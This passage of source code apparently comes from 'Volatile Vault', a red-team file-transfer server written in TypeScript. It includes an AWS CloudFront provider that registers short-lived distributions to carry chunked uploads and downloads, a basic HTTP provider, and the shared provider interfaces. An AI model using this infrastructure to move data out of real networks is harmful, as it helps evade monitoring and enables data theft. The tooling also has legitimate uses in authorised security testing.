JSON.stringify(error)}` 447 | ); 448 | return res.status(400).json({ message: error?.message ?? 'Failure' }); 449 | } 450 | } 451 | ); 452 | app.use(chunkedDownload); 453 | 454 | const terminateDownload = express.Router(); 455 | terminateDownload.post( 456 | `/api/${AwsCloudFrontExfilProvider.NAME}/download/terminate/:transferId`, 457 | async (req: Request, res: Response) => { 458 | this.logger.info( 459 | `Termination of ${req.params?.transferId ?? 'n/a'} requested from ${ 460 | req.ip 461 | }` 462 | ); 463 | 464 | try { 465 | const transferId = req.params?.transferId; 466 | if (!transferId) throw new Error(`Invalid transfer ${transferId}`); 467 | const transfer = this.downloads.find((t) => t.id === transferId); 468 | if (transfer === undefined) 469 | throw new Error(`Unknown transfer ${transferId}`); 470 | 471 | if (transfer.chunks.find((c) => !c.done)) 472 | throw new Error(`Unfinished download`); 473 | 474 | // Remove all files from disk 475 | for (const chunk of transfer.chunks) 476 | await transfer.fs.removeFile(chunk.fileId); 477 | 478 | // Remove transfer from list 479 | this.downloads = this.downloads.filter((t) => t.id !== transferId); 480 | 481 | // Release domains 482 | if (this.config.download.mode == 'Dynamic') 483 | await this.client.releaseDistributions(transferId); 484 | 485 | return res.json({ message: 'Termination successful' }); 486 | } catch (error) { 487 | this.logger.error( 488 | `Error: ${error?.message ?? JSON.stringify(error)}` 489 | ); 490 | return res.status(400).json({ message: error?.message ?? 'Failure' }); 491 | } 492 | } 493 | ); 494 | app.use(terminateDownload); 495 | } 496 | 497 | async initChunkUpload(storage: string, size: number): Promise { 498 | const transferId = TRANSFER_IDS.rnd(); 499 | 500 | const domains = await this.allocateDomainsForTransfer( 501 | transferId, 502 | size, 503 | 'Upload' 504 | ); 505 | 506 | const numChunks = Math.ceil(size / this.chunk_size); 507 | 508 | const transfer = { 509 | id: transferId, 510 | hosts: domains, 511 | chunks: Array.from({ length: numChunks }, (_, key) => { 512 | return { chunkId: key, fileId: null, done: false }; 513 | }), 514 | storage: storage, 515 | total_size: size, 516 | creation: new Date(Date.now()), 517 | fs: new FsUtils(`${AwsCloudFrontExfilProvider.NAME}:${transferId}`), 518 | }; 519 | 520 | this.uploads.push(transfer); 521 | 522 | await transfer.fs.init(path.join(this.config.folder, transfer.id)); 523 | 524 | return transferId; 525 | } 526 | 527 | private async allocateDomainsForTransfer( 528 | transferId: string, 529 | size: number, 530 | transfer: 'Upload' | 'Download' 531 | ): Promise { 532 | const transferConfig = 533 | transfer == 'Upload' ? this.config.upload : this.config.download; 534 | 535 | const calculatedHosts = Math.ceil(size / this.chunk_size); 536 | const limit = 537 | transferConfig.mode == 'Dynamic' 538 | ? transferConfig.max_dynamic_hosts > 0 539 | ? transferConfig.max_dynamic_hosts 540 | : 0 541 | : transferConfig.hosts.length; 542 | const numHosts = 543 | limit > 0 ? Math.min(calculatedHosts, limit) : calculatedHosts; 544 | 545 | if (transferConfig.mode == 'Dynamic') { 546 | // Dynamically allocate domains 547 | this.logger.info( 548 | `Registering ${numHosts} domain(s) for transfer ${transferId}...` 549 | ); 550 | const hostPromises = Array.from({ length: numHosts }, (_, key) => 551 | this.client.registerDomain(`${transferId}-${key}`) 552 | ); 553 | const domains = (await Promise.all(hostPromises)).map( 554 | (r) => r.Distribution.DomainName 555 | ); 556 | this.logger.info( 557 | `Using allocated domains for transfer ${transferId}: ${domains}` 558 | ); 559 | return domains; 560 | } else { 561 | // Use statically (pre-)allocated domains 562 | var idx = 563 | transfer == 'Upload' ? this.staticUploadIdx : this.staticDownloadIdx; 564 | const domains = Array.from( 565 | { length: numHosts }, 566 | (_, key) => 567 | transferConfig.hosts[(idx + key) % transferConfig.hosts.length] 568 | ); 569 | if (transfer == 'Upload') this.staticUploadIdx += numHosts; 570 | else this.staticDownloadIdx += numHosts; 571 | this.logger.info( 572 | `Using pre-allocated domains for transfer ${transferId}: ${domains}` 573 | ); 574 | return domains; 575 | } 576 | } 577 | 578 | async uploadChunk( 579 | transferId: string, 580 | chunkNo: number, 581 | data: BinaryData 582 | ): Promise { 583 | const transfer = this.uploads.find((t) => t.id === transferId); 584 | if (chunkNo < 0 || chunkNo > transfer.chunks.length) 585 | throw new Error(`Invalid chunk number ${chunkNo}`); 586 | 587 | if (transfer.chunks[chunkNo].done) 588 | throw new Error(`Chunk ${chunkNo} already uploaded`); 589 | 590 | this.logger.debug(`Saving chunk ${chunkNo} of ${transferId}...`); 591 | const info = await transfer.fs.putFile(data.stream); 592 | transfer.chunks[chunkNo].fileId = info.id; 593 | transfer.chunks[chunkNo].done = true; 594 | 595 | // If there are still missing chunks, return empty file info 596 | if (transfer.chunks.find((c) => !c.done)) return {}; 597 | 598 | // Else, assemble file and move to storage 599 | const storage = ExtensionRepository.getInstance().getStorage( 600 | transfer.storage 601 | ); 602 | 603 | this.logger.debug(`Retrieving all files of ${transferId}...`); 604 | const files = await Promise.all( 605 | transfer.chunks.map(async (c) => { 606 | const fileInfo = await transfer.fs.getFile(c.fileId); 607 | return fileInfo; 608 | }) 609 | ); 610 | 611 | const multistream = new MultiStream(files.map((f) => f[0])); 612 | 613 | this.logger.debug( 614 | `Storing combined data of ${transferId} to ${storage.name}...` 615 | ); 616 | const storageInfo = await storage.store({ 617 | size: files.reduce((sum, file) => sum + file[1], 0), 618 | stream: multistream, 619 | }); 620 | 621 | this.logger.debug(`Clearing temporary files of ${transferId}...`); 622 | for (const chunk of transfer.chunks) 623 | await transfer.fs.removeFile(chunk.fileId); 624 | 625 | this.logger.info(`Transfer ${transferId} completed successfully!`); 626 | 627 | // Close transfer: remove transfer from list & release domains 628 | this.uploads = this.uploads.filter((t) => t.id == transferId); 629 | if (this.config.upload.mode == 'Dynamic') 630 | await this.client.releaseDistributions(transferId); 631 | 632 | // TODO: How do we handle termination date info (for UI) here? 633 | return { id: storageInfo.id, url: storageInfo.url }; 634 | } 635 | 636 | async initChunkDownload(info: FileInformation): Promise { 637 | const transferId = TRANSFER_IDS.rnd(); 638 | const storage = await ExtensionRepository.getInstance().getStorageForFile( 639 | info.id 640 | ); 641 | var data = await storage.retrieve({ id: info.id }); 642 | 643 | const domains = await this.allocateDomainsForTransfer( 644 | transferId, 645 | data.size, 646 | 'Download' 647 | ); 648 | 649 | const numChunks = Math.ceil(data.size / this.chunk_size); 650 | 651 | const transfer: DownloadTransferData = { 652 | total_size: data.size, 653 | chunks: Array.from({ length: numChunks }, (_, key) => { 654 | return { chunkId: key, fileId: null, done: false }; 655 | }), 656 | id: transferId, 657 | storage: storage.name, 658 | hosts: domains, 659 | creation: new Date(Date.now()), 660 | fs: new FsUtils(`${AwsCloudFrontExfilProvider.NAME}:${transferId}`), 661 | }; 662 | 663 | await transfer.fs.init(path.join(this.config.folder, transferId)); 664 | 665 | this.logger.info(`Writing file into ${numChunks} chunk files...`); 666 | 667 | await readFixedChunks( 668 | data.stream, 669 | this.chunk_size, 670 | async (chunk: Buffer, count: number) => { 671 | const fileInfo = await transfer.fs.putFile(Readable.from(chunk)); 672 | transfer.chunks[count].fileId = fileInfo.id; 673 | this.logger.debug( 674 | `Chunk #${count}: ${chunk.length} bytes: ${fileInfo.id}` 675 | ); 676 | } 677 | ); 678 | 679 | this.downloads.push(transfer); 680 | 681 | return transferId; 682 | } 683 | 684 | async downloadChunk( 685 | transferId: string, 686 | chunkNo: number 687 | ): Promise { 688 | const transfer = this.downloads.find((t) => t.id === transferId); 689 | const chunk = transfer.chunks.find((c) => c.chunkId == chunkNo); 690 | 691 | if (chunk === undefined) throw new Error(`Chunk ${chunkNo} not found`); 692 | 693 | this.logger.debug(`Saving chunk ${chunkNo} of ${transferId}...`); 694 | const [stream, size] = await transfer.fs.getFile(chunk.fileId); 695 | chunk.done = true; 696 | 697 | return { size, stream }; 698 | } 699 | 700 | uploadSingle( 701 | storage: string, 702 | data: BinaryData 703 | ): Promise { 704 | throw new Error('Method not supported.'); 705 | } 706 | downloadSingle(info: FileInformation): Promise { 707 | throw new Error('Method not supported.'); 708 | } 709 | addHost(): Promise { 710 | throw new Error('Method not implemented.'); 711 | } 712 | removeHost(host: string): Promise { 713 | throw new Error('Method not implemented.'); 714 | } 715 | } 716 | -------------------------------------------------------------------------------- /server/src/extensions/exfil/AwsCloudFront/distributionconfig.json: -------------------------------------------------------------------------------- 1 | { 2 | "CallerReference": "CHANGEME", 3 | "Comment": "VolatileVault-Cloudfront-Distribution", 4 | "DefaultCacheBehavior": { 5 | "TargetOriginId": "CHANGEME", 6 | "ViewerProtocolPolicy": "https-only", 7 | "AllowedMethods": { 8 | "Quantity": 7, 9 | "Items": ["HEAD", "DELETE", "POST", "GET", "OPTIONS", "PUT", "PATCH"], 10 | "CachedMethods": { 11 | "Quantity": 2, 12 | "Items": ["HEAD", "GET"] 13 | } 14 | }, 15 | "Compress": false, 16 | "CachePolicyId": "4135ea2d-6df8-44a3-9df3-4b5a84be39ad", 17 | "TrustedSigners": { 18 | "Enabled": false, 19 | "Quantity": 0 20 | } 21 | }, 22 | "Enabled": true, 23 | "Origins": { 24 | "Quantity": 1, 25 | "Items": [ 26 | { 27 | "Id": "CHANGEME", 28 | "DomainName": "CHANGEME", 29 | "CustomOriginConfig": { 30 | "HTTPPort": 80, 31 | "HTTPSPort": 443, 32 | "OriginProtocolPolicy": "https-only", 33 | "OriginReadTimeout": 30, 34 | "OriginKeepaliveTimeout": 5 35 | } 36 | } 37 | ] 38 | }, 39 | "Aliases": { 40 | "Quantity": 0 41 | }, 42 | "CacheBehaviors": { 43 | "Quantity": 0 44 | }, 45 | "Logging": { 46 | "Enabled": false, 47 | "IncludeCookies": false, 48 | "Bucket": "", 49 | "Prefix": "" 50 | }, 51 | "PriceClass": "PriceClass_All", 52 | "ViewerCertificate": { 53 | "CloudFrontDefaultCertificate": true 54 | } 55 | } 56 | -------------------------------------------------------------------------------- /server/src/extensions/exfil/AwsCloudFront/wrapper.ts: -------------------------------------------------------------------------------- 1 | import { 2 | CachePolicySummary, 3 | CloudFront, 4 | CreateCachePolicyCommand, 5 | CreateCachePolicyRequest, 6 | CreateDistributionCommand, 7 | CreateDistributionRequest, 8 | DeleteDistributionCommand, 9 | DistributionConfig, 10 | DistributionSummary, 11 | GetDistributionCommand, 12 | GetDistributionResult, 13 | ListCachePoliciesCommand, 14 | ListDistributionsCommand, 15 | UpdateDistributionCommand, 16 | } from '@aws-sdk/client-cloudfront'; 17 | import { Logger } from '../../../logging'; 18 | import winston from 'winston'; 19 | import distributionconfig from './distributionconfig.json'; 20 | 21 | export class CloudFrontWrapper { 22 | private client: CloudFront; 23 | private logger: winston.Logger; 24 | private distributionTag: string; 25 | private domain: string; 26 | private cachePolicyId: string; 27 | 28 | public constructor( 29 | accessKeyId: string, 30 | secretAccessKey: string, 31 | region: string, 32 | distributionTag: string, 33 | domain: string 34 | ) { 35 | this.client = new CloudFront({ 36 | credentials: { 37 | accessKeyId, 38 | secretAccessKey, 39 | }, 40 | apiVersion: 'latest', 41 | region, 42 | }); 43 | this.distributionTag = distributionTag; 44 | this.domain = domain; 45 | this.logger = Logger.Instance.createChildLogger('AwsCloudFrontWrapper'); 46 | } 47 | 48 | public async validateCredentials(): Promise { 49 | try { 50 | const res = await this.client.send( 51 | new ListDistributionsCommand({ MaxItems: 1 }) 52 | ); 53 | return true; 54 | } catch (error) { 55 | this.logger.error( 56 | `Failed validating AWS CloudFront credentials: ${ 57 | error?.message ?? error 58 | }` 59 | ); 60 | return false; 61 | } 62 | } 63 | 64 | public async listDistributionsByTransferId( 65 | transferId: string 66 | ): Promise { 67 | let distributionSummaries: DistributionSummary[] = []; 68 | let marker: string | undefined = undefined; 69 | 70 | do { 71 | const command = new ListDistributionsCommand({ Marker: marker }); 72 | const response = await this.client.send(command); 73 | 74 | const filteredDistributions = 75 | response.DistributionList?.Items?.filter((distribution) => { 76 | return distribution.Origins.Items.some((origin) => 77 | origin.Id.includes(transferId) 78 | ); 79 | }) || []; 80 | 81 | distributionSummaries.push(...filteredDistributions); 82 | 83 | marker = response.DistributionList.NextMarker; 84 | } while (marker); 85 | 86 | return distributionSummaries; 87 | } 88 | 89 | public async getCachePolicyId(): Promise { 90 | this.cachePolicyId = await this.getOrCreateCachePolicy(); 91 | } 92 | 93 | private async getOrCreateCachePolicy(): Promise { 94 | const policyName = 'VolatileVault-IncludeAuthorizationHeaderPolicy'; 95 | 96 | // Check if the cache policy already exists 97 | const existingPolicyId = await this.findCachePolicyIdByName(policyName); 98 | if (existingPolicyId) { 99 | return existingPolicyId; 100 | } 101 | 102 | // Create a new cache policy 103 | const policyConfig: CreateCachePolicyRequest = { 104 | CachePolicyConfig: { 105 | Name: policyName, 106 | DefaultTTL: 86400, // One day 107 | MaxTTL: 31536000, // One year 108 | MinTTL: 0, 109 | ParametersInCacheKeyAndForwardedToOrigin: { 110 | EnableAcceptEncodingBrotli: true, 111 | EnableAcceptEncodingGzip: true, 112 | HeadersConfig: { 113 | HeaderBehavior: 'whitelist', 114 | Headers: { 115 | Quantity: 1, 116 | Items: ['Authorization'], 117 | }, 118 | }, 119 | CookiesConfig: { 120 | CookieBehavior: 'none', 121 | }, 122 | QueryStringsConfig: { 123 | QueryStringBehavior: 'none', 124 | }, 125 | }, 126 | }, 127 | }; 128 | 129 | const command = new CreateCachePolicyCommand(policyConfig); 130 | const response = await this.client.send(command); 131 | 132 | return response.CachePolicy?.Id!; 133 | } 134 | 135 | private async findCachePolicyIdByName( 136 | policyName: string 137 | ): Promise { 138 | const command = new ListCachePoliciesCommand({}); 139 | const response = await this.client.send(command); 140 | 141 | const policy = response.CachePolicyList?.Items?.find( 142 | (item: CachePolicySummary) => 143 | item.CachePolicy?.CachePolicyConfig?.Name === policyName 144 | ); 145 | return policy?.CachePolicy?.Id; 146 | } 147 | 148 | public async releaseDistributions(transferId: string): Promise { 149 | try { 150 | const distributions = await this.listDistributionsByTransferId( 151 | transferId 152 | ); 153 | for (const distribution of distributions) { 154 | this.releaseDomain(distribution.Id); 155 | } 156 | } catch (error) { 157 | // TODO: Catch ratelimiting error and retry automatically after waiting 158 | this.logger.error( 159 | `Error releasing CloudFront domains: ${error?.message ?? error}` 160 | ); 161 | throw error; 162 | } 163 | } 164 | 165 | public async areDistributionsReady(transferId: string): Promise { 166 | try { 167 | const distributions = await this.listDistributionsByTransferId( 168 | transferId 169 | ); 170 | if (distributions.length === 0) throw new Error('No distributions found'); 171 | 172 | for (const distribution of distributions) { 173 | if (distribution.Status !== 'Deployed') { 174 | return false; 175 | } 176 | } 177 | return true; 178 | } catch (error) { 179 | throw error; 180 | } 181 | } 182 | 183 | public async registerDomain( 184 | transferIdAndCount: string 185 | ): Promise { 186 | const config = this.getDistributionConfig(transferIdAndCount); 187 | const input: CreateDistributionRequest = { DistributionConfig: config }; 188 | const command = new CreateDistributionCommand(input); 189 | 190 | try { 191 | const data: GetDistributionResult = await this.client.send(command); 192 | this.logger.info(`Domain created: ${data.Distribution?.DomainName}`); 193 | return data; 194 | } catch (error) { 195 | this.logger.error( 196 | `Failed registering domain: ${error?.message ?? error}` 197 | ); 198 | throw error?.message ?? error; 199 | } 200 | } 201 | 202 | public async releaseDomain(id: string): Promise { 203 | // Get the current distribution config 204 | const getDistCommand = new GetDistributionCommand({ Id: id }); 205 | const getDistResponse = await this.client.send(getDistCommand); 206 | 207 | if (getDistResponse.Distribution.DistributionConfig.Enabled) { 208 | // Update the distribution to disable it 209 | const updateDistCommand = new UpdateDistributionCommand({ 210 | Id: id, 211 | IfMatch: getDistResponse.ETag, // Use the ETag from the get operation 212 | DistributionConfig: { 213 | ...getDistResponse.Distribution.DistributionConfig, 214 | Enabled: false, // Disable the distribution 215 | }, 216 | }); 217 | await this.client.send(updateDistCommand); 218 | this.logger.debug(`CloudFront distribution disabled: ${id}`); 219 | } 220 | 221 | // Wait until the distribution is fully disabled and the status is 'Deployed' 222 | const latestEtag = await this.waitForDistributionDeployed( 223 | id, 224 | getDistResponse.ETag 225 | ); 226 | 227 | // Once disabled, delete the distribution 228 | const deleteCommand = new DeleteDistributionCommand({ 229 | Id: id, 230 | IfMatch: latestEtag, // Use the latest ETag from the waitForDistributionDeployed function 231 | }); 232 | await this.client.send(deleteCommand); 233 | this.logger.info(`CloudFront distribution deleted: ${id}`); 234 | } 235 | 236 | private async waitForDistributionDeployed( 237 | distributionId: string, 238 | etag: string 239 | ): Promise { 240 | // Helper function to wait for a specified number of milliseconds 241 | const delay = (ms: number) => 242 | new Promise((resolve) => setTimeout(resolve, ms)); 243 | const command = new GetDistributionCommand({ Id: distributionId }); 244 | 245 | let status = ''; 246 | do { 247 | this.logger.debug( 248 | `Waiting 30s for distribution ${distributionId} to finish deployment...` 249 | ); 250 | await delay(30000); // 30 seconds 251 | 252 | // Retrieve the distribution information 253 | const response = await this.client.send(command); 254 | status = response.Distribution.Status; 255 | 256 | // Check if the ETag has changed and use the latest one 257 | if (response.ETag !== etag) { 258 | etag = response.ETag; 259 | } 260 | } while (status !== 'Deployed'); 261 | 262 | // Make sure to return the latest ETag to use for the delete operation 263 | return etag; 264 | } 265 | 266 | private getDistributionConfig( 267 | transferIdAndCount: string 268 | ): DistributionConfig { 269 | var cfg = structuredClone(distributionconfig) as DistributionConfig; 270 | 271 | cfg.CallerReference = 272 | cfg.CallerReference = `[VolatileVault] ${this.distributionTag} ${transferIdAndCount};`; 273 | cfg.DefaultCacheBehavior.TargetOriginId = transferIdAndCount; 274 | cfg.Origins.Items[0].DomainName = this.domain; 275 | cfg.Origins.Items[0].Id = transferIdAndCount; 276 | cfg.DefaultCacheBehavior.CachePolicyId = this.cachePolicyId; 277 | 278 | return cfg; 279 | } 280 | } 281 | -------------------------------------------------------------------------------- /server/src/extensions/exfil/BasicHttp/README.md: -------------------------------------------------------------------------------- 1 |
2 | 3 |

Volatile Vault - BasicHttp Exfil

4 |
5 |
6 | 7 | This exfil allows Volatile Vault to upload files to and download them from the very same backend where its API is running on. 8 | 9 | # Configuration 10 | 11 | Example: 12 | 13 | ```yaml 14 | --- 15 | exfil: 16 | basichttp: 17 | max_total_size: 104857600 18 | hosts: 19 | - 'https://my.cool.site' 20 | ``` 21 | 22 | Fields: 23 | 24 | - `max_total_size`: Maximum allowed size of a single data transfer (upload or download). 25 | - `hosts`: (Optional) List of hosts the frontend may use to proxy data transfers through. 26 | -------------------------------------------------------------------------------- /server/src/extensions/exfil/BasicHttp/basichttp.ts: -------------------------------------------------------------------------------- 1 | import bodyParser from 'body-parser'; 2 | import express, { Express, Request, Response } from 'express'; 3 | import { Readable } from 'node:stream'; 4 | import winston from 'winston'; 5 | import { Config, ExfilBasicHTTP } from '../../../config/config'; 6 | import { BaseExtension, ExtensionInfo, FileUploadInformation } from '../../extension'; 7 | import { ExtensionRepository } from '../../repository'; 8 | import { Logger } from '../../../logging'; 9 | import { 10 | BinaryData, 11 | ExfilProvider, 12 | ExfilProviderCapabilities, 13 | FileInformation, 14 | } from '../provider'; 15 | 16 | export class BasicHTTPExfilProvider 17 | extends BaseExtension 18 | implements ExfilProvider 19 | { 20 | private static NAME: string = 'basichttp'; 21 | private logger: winston.Logger; 22 | 23 | public constructor() { 24 | super(BasicHTTPExfilProvider.NAME, ['DownloadSingle', 'UploadSingle']); 25 | this.logger = Logger.Instance.createChildLogger('BasicHTTP'); 26 | } 27 | 28 | get config(): ExfilBasicHTTP { 29 | return this.cfg.exfil.basichttp; 30 | } 31 | 32 | get clientConfig(): ExtensionInfo { 33 | return { 34 | name: BasicHTTPExfilProvider.NAME, 35 | displayName: 'Built-in HTTP', 36 | info: this.config, 37 | }; 38 | } 39 | 40 | async init(cfg: Config): Promise { 41 | this.cfg = cfg; 42 | if (this.config) { 43 | this.logger.info('Initialized'); 44 | this.register(); 45 | this.state = 'Initialized'; 46 | } else { 47 | this.logger.debug('Config not set'); 48 | this.state = 'Unconfigured'; 49 | } 50 | } 51 | 52 | protected register() { 53 | ExtensionRepository.getInstance().registerExfil(this); 54 | } 55 | 56 | get hosts(): Promise { 57 | return Promise.resolve(this.config.hosts); 58 | } 59 | 60 | installRoutes(app: Express): Promise { 61 | // Upload 62 | const uploadRoute = express.Router(); 63 | 64 | uploadRoute.use( 65 | bodyParser.raw({ 66 | limit: this.config.max_total_size, 67 | type: 'application/octet-stream', 68 | }) 69 | ); 70 | 71 | uploadRoute.use((error, req, res, next) => { 72 | if (error) { 73 | return res.status(413).json({ message: 'Data exceeds size limit' }); 74 | } 75 | next(error); 76 | }); 77 | 78 | uploadRoute.post( 79 | `/api/${BasicHTTPExfilProvider.NAME}/upload/:storage`, 80 | async (req: Request, res: Response) => { 81 | this.logger.info( 82 | `Upload request to ${req.params?.storage ?? 'n/a'} from ${req.ip}` 83 | ); 84 | 85 | try { 86 | // Validate storage param 87 | const storageName = req.params?.storage; 88 | if (!storageName) throw new Error('Missing storage'); 89 | 90 | const storage = 91 | ExtensionRepository.getInstance().getStorage(storageName); 92 | 93 | // Validate body 94 | const body = req.body as Buffer; 95 | if (!body || !body.length) throw new Error('Missing body'); 96 | 97 | this.logger.debug(`Storing using ${storageName}`); 98 | const result = await this.uploadSingle(storageName, { 99 | stream: Readable.from(body), 100 | size: body.length, 101 | }); 102 | 103 | this.logger.debug('Store successful!'); 104 | res.json({ 105 | ...result, 106 | message: 'Upload successful', 107 | lifeTime: storage.config.file_expiry * 1000 * 60, 108 | }); 109 | } catch (error) { 110 | this.logger.error( 111 | `Error: ${error?.message ?? JSON.stringify(error)}` 112 | ); 113 | return res.status(400).json({ message: error?.message ?? 'Failure' }); 114 | } 115 | } 116 | ); 117 | app.use(uploadRoute); 118 | 119 | // Download 120 | const downloadRoute = express.Router(); 121 | downloadRoute.use(bodyParser.json()); 122 | 123 | downloadRoute.get( 124 | `/api/${BasicHTTPExfilProvider.NAME}/download/:id`, 125 | async (req: Request, res: Response) => { 126 | this.logger.info( 127 | `Download request for ${req.params?.id ?? 'n/a'} from ${req.ip}` 128 | ); 129 | 130 | try { 131 | // Validate file id param 132 | const id = req.params?.id; 133 | if (!id) throw new Error('Missing id'); 134 | 135 | // Acquire data 136 | const data = await this.downloadSingle({ id: id }); 137 | 138 | // Send 139 | res.writeHead(200, { 140 | 'Content-Type': 'application/octet-stream', 141 | 'Content-Length': data.size.toString(), 142 | }); 143 | 144 | for await (const chunk of data.stream) res.write(chunk, 'binary'); 145 | 146 | res.end(); 147 | } catch (error) { 148 | this.logger.error( 149 | `Error: ${error?.message ?? JSON.stringify(error)}` 150 | ); 151 | return res.status(400).json({ message: error?.message ?? 'Failure' }); 152 | } 153 | } 154 | ); 155 | app.use(downloadRoute); 156 | 157 | return Promise.resolve(); 158 | } 159 | 160 | async uploadSingle( 161 | storageName: string, 162 | data: BinaryData 163 | ): Promise { 164 | // Validate specified storage 165 | var storage = ExtensionRepository.getInstance().getStorage(storageName); 166 | 167 | // Store file 168 | var file = await storage.store(data); 169 | return { 170 | id: file.id, 171 | url: file.url 172 | }; 173 | } 174 | 175 | async downloadSingle(info: FileInformation): Promise { 176 | const storage = await ExtensionRepository.getInstance().getStorageForFile(info.id); 177 | var data = await storage.retrieve({ id: info.id }); 178 | 179 | return data; 180 | } 181 | 182 | // Unsupported methods 183 | initChunkDownload(info: FileInformation): Promise { 184 | throw new Error('Method not supported.'); 185 | } 186 | initChunkUpload(storage: string, size: number): Promise { 187 | throw new Error('Method not supported.'); 188 | } 189 | uploadChunk(transferId: string, chunkNo: number, data: BinaryData): Promise { 190 | throw new Error('Method not supported.'); 191 | } 192 | downloadChunk(transferId: string, chunkNo: number): Promise { 193 | throw new Error('Method not supported.'); 194 | } 195 | addHost(): Promise { 196 | throw new Error('Method not supported.'); 197 | } 198 | removeHost(host: string): Promise { 199 | throw new Error('Method not supported.'); 200 | } 201 | } 202 | -------------------------------------------------------------------------------- /server/src/extensions/exfil/provider.ts: -------------------------------------------------------------------------------- 1 | import { Readable } from 'node:stream'; 2 | import { Extension, FileUploadInformation } from '../extension'; 3 | import express from 'express'; 4 | import { BaseExfil } from '../../config/config'; 5 | 6 | /** 7 | * Holds information about a stored item, can be extended by individual storage providers 8 | * 9 | * @export 10 | * @interface FileInformation 11 | * @typedef {FileInformation} 12 | */ 13 | export interface FileInformation { 14 | id: string; // ID of an uploaded item 15 | } 16 | 17 | /** 18 | * Enum that lets exfil providers declare their supported capabilities 19 | * 20 | * @export 21 | * @enum {number} 22 | */ 23 | export type ExfilProviderCapabilities = 24 | | 'None' 25 | | 'UploadSingle' 26 | | 'DownloadSingle' 27 | | 'UploadChunked' 28 | | 'DownloadChunked' 29 | | 'AddHost' 30 | | 'RemoveHost'; 31 | 32 | /** 33 | * Holds a binary stream and its length 34 | * 35 | * @export 36 | * @interface BinaryData 37 | * @typedef {BinaryData} 38 | */ 39 | export interface BinaryData { 40 | // TODO: same as server\src\storage\provider.ts:StorageData, define single central interface instead 41 | stream: Readable; // Stream to read binary contents from 42 | size: number; // Length of stream 43 | } 44 | 45 | /** 46 | * Basic interface for file upload/download 47 | * 48 | * @export 49 | * @interface ExfilProvider 50 | * @typedef {ExfilProvider} 51 | */ 52 | export interface ExfilProvider extends Extension { 53 | get hosts(): Promise; 54 | get config(): BaseExfil; 55 | 56 | /** 57 | * Allows extensions to install their own routes 58 | * 59 | * @param {express.Express} app 60 | * @returns {Promise} 61 | */ 62 | installRoutes(app: express.Express): Promise; 63 | 64 | // Simple up/downloads 65 | uploadSingle( 66 | storage: string, 67 | data: BinaryData 68 | ): Promise; 69 | downloadSingle(info: FileInformation): Promise; 70 | 71 | // Chunked up/downloads 72 | initChunkUpload(storage: string, size: number): Promise; // TODO: Define info type 73 | initChunkDownload(info: FileInformation): Promise; 74 | uploadChunk(transferId: string, chunkNo: number, data: BinaryData): Promise; 75 | downloadChunk(transferId: string, chunkNo: number): Promise; 76 | 77 | // Hosts management 78 | addHost(): Promise; 79 | removeHost(host: string): Promise; 80 | } 81 | -------------------------------------------------------------------------------- /server/src/extensions/extension.ts: -------------------------------------------------------------------------------- 1 | import { Config } from '../config/config'; 2 | 3 | export type ExtensionState = 4 | | 'Uninitialized' 5 | | 'Initialized' 6 | | 'InitializationError' 7 | | 'Unconfigured'; 8 | 9 | export interface ExtensionInfo { 10 | name: string; 11 | displayName: string; 12 | info: object; 13 | } 14 | 15 | export interface FileUploadInformation { 16 | id?: string; // ID of an uploaded item 17 | url?: string; // URL at which to download the uploaded item 18 | creationDate?: Date; // Time at which the item was uploaded 19 | } 20 | 21 | export interface Extension { 22 | get name(): string; 23 | get capabilities(): CAP[]; 24 | get clientConfig(): ExtensionInfo; 25 | get state(): ExtensionState; 26 | 27 | supports(capability: CAP): boolean; 28 | 29 | init(cfg: Config): Promise; 30 | 31 | /** 32 | * Allows extensions to install their own cron jobs 33 | * 34 | * @returns {Promise} 35 | */ 36 | installCron(): Promise; 37 | } 38 | 39 | export abstract class BaseExtension 40 | implements Extension 41 | { 42 | public get name(): string { 43 | return this._name; 44 | } 45 | public get capabilities(): CAP[] { 46 | return this._capabilities; 47 | } 48 | public get state(): ExtensionState { 49 | return this._state; 50 | } 51 | protected set state(val: ExtensionState) { 52 | this._state = val; 53 | } 54 | 55 | private _name: string; 56 | private _state: ExtensionState = 'Uninitialized'; 57 | private _capabilities: CAP[]; 58 | protected cfg: Config; 59 | 60 | protected constructor(name: string, capabilities: CAP[]) { 61 | this._name = name; 62 | this._capabilities = capabilities; 63 | } 64 | 65 | abstract get clientConfig(): ExtensionInfo; 66 | 67 | public installCron(): Promise { 68 | return Promise.resolve(); 69 | } 70 | 71 | abstract init(cfg: Config): Promise; 72 | 73 | supports(capability: CAP): boolean { 74 | return this._capabilities.indexOf(capability) !== -1; 75 | } 76 | 77 | protected abstract register(); 78 | } 79 | -------------------------------------------------------------------------------- /server/src/extensions/repository.ts: -------------------------------------------------------------------------------- 1 | import { ExfilProvider } from './exfil/provider'; 2 | import { StorageProvider } from './storage/provider'; 3 | 4 | export class ExtensionRepository { 5 | private static instance: ExtensionRepository | null = null; 6 | 7 | private _storages: Map; 8 | private _exfils: Map; 9 | 10 | public get storages(): StorageProvider[] { 11 | return Array.from(this._storages.values()); 12 | } 13 | public get exfils(): ExfilProvider[] { 14 | return Array.from(this._exfils.values()); 15 | } 16 | 17 | private constructor() { 18 | this._storages = new Map(); 19 | this._exfils = new Map(); 20 | } 21 | 22 | public static getInstance(): ExtensionRepository { 23 | if (ExtensionRepository.instance == null) { 24 | ExtensionRepository.instance = new ExtensionRepository(); 25 | } 26 | 27 | return ExtensionRepository.instance; 28 | } 29 | 30 | public registerStorage(storage: StorageProvider): void { 31 | if (this._storages.has(storage.name)) 32 | throw new Error(`Storage "${storage.name}" already registered!`); 33 | 34 | this._storages.set(storage.name, storage); 35 | } 36 | 37 | public getStorage(name: string): StorageProvider { 38 | if (!this._storages.has(name)) 39 | throw new Error(`Storage "${name}" not registered!`); 40 | 41 | return this._storages.get(name); 42 | } 43 | 44 | public async getStorageForFile(id: string): Promise { 45 | for (const storage of ExtensionRepository.getInstance().storages) { 46 | if (await storage.has(id)) return storage; 47 | } 48 | throw new Error('Unknown file'); 49 | } 50 | 51 | public registerExfil(exfil: ExfilProvider): void { 52 | if (this._exfils.has(exfil.name)) 53 | throw new Error(`Exfil "${exfil.name}" already registered!`); 54 | 55 | this._exfils.set(exfil.name, exfil); 56 | } 57 | 58 | public getExfil(name: string): ExfilProvider { 59 | if (!this._exfils.has(name)) 60 | throw new Error(`Exfil "${name}" not registered!`); 61 | 62 | return this._exfils.get(name); 63 | } 64 | } 65 | -------------------------------------------------------------------------------- /server/src/extensions/storage/AwsS3/README.md: -------------------------------------------------------------------------------- 1 |
2 | 3 |

Volatile Vault - AwsS3 Storage

4 |
5 |
